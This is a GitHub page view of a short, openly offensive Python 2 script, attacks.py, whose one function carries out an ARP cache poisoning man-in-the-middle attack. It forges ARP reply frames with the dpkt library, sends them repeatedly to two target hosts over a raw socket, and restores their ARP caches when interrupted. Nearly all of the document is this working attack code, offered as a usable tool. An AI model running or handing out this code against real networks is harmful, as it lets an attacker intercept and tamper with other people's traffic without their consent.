-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathattacks.py
68 lines (65 loc) · 3.18 KB
/
attacks.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
##########################################################################
# Copyright (C) Chatzopoulos Dimos 2010 <[email protected]> #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
##########################################################################
import dpkt
import socket
import time
import functs
def mitm(target1, target2, device):
"""
Perform Man-In-The-Middle attack, with ARP cache poisoning
"""
arp1 = dpkt.arp.ARP() # create ARP obejcts
arp2 = dpkt.arp.ARP()
arp2.op = arp1.op = dpkt.arp.ARP_OP_REPLY # set the ARP opcode
arp2.sha = arp1.sha = functs.eth_aton(functs.get_device_mac(device)) # get the local mac address and assign it
arp1.tha = functs.eth_aton(functs.get_mac(target1, device)) # get mac address for targets
arp2.tha = functs.eth_aton(functs.get_mac(target2, device))
arp1.spa = socket.inet_aton(target2)
arp2.spa = socket.inet_aton(target1)
arp1.tpa = socket.inet_aton(target1)
arp2.tpa = socket.inet_aton(target2)
eth1 = dpkt.ethernet.Ethernet() # create Ethernet objects
eth2 = dpkt.ethernet.Ethernet()
eth1.src = eth2.src = functs.eth_aton(functs.get_device_mac(device))
eth1.dst = arp1.tha
eth2.dst = arp2.tha
eth1.data = arp1 # assign ARP objects to ethernet object data
eth2.data = arp2
eth1.type = eth2.type = dpkt.ethernet.ETH_TYPE_ARP # set the ethernet type
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) # create PF_PACKET socket instance
s.bind((device, dpkt.ethernet.ETH_TYPE_ARP)) # bind the socket
print 'Poisoning',target1,'and', target2,'...\n\n'
while 1:
try:
s.send(eth1.pack())# send frame1@target1
s.send(eth2.pack()) # send frame2@target2
time.sleep(5) # delay seconds
except KeyboardInterrupt: # stop at keyboard interupt
print "\n\n MITM attack stopped. \n"
# Restore targets' ARP cache
arp2.sha = eth1.dst
arp1.sha = eth2.dst
eth1.data = arp1
eth2.data = arp2
print 're-ARPing',target1,'...',
s.send(eth1.pack())
print 'Done!\n'
print 're-ARPing',target2,'...',
s.send(eth2.pack())
print 'Done!\n'
s.close() # close socket
break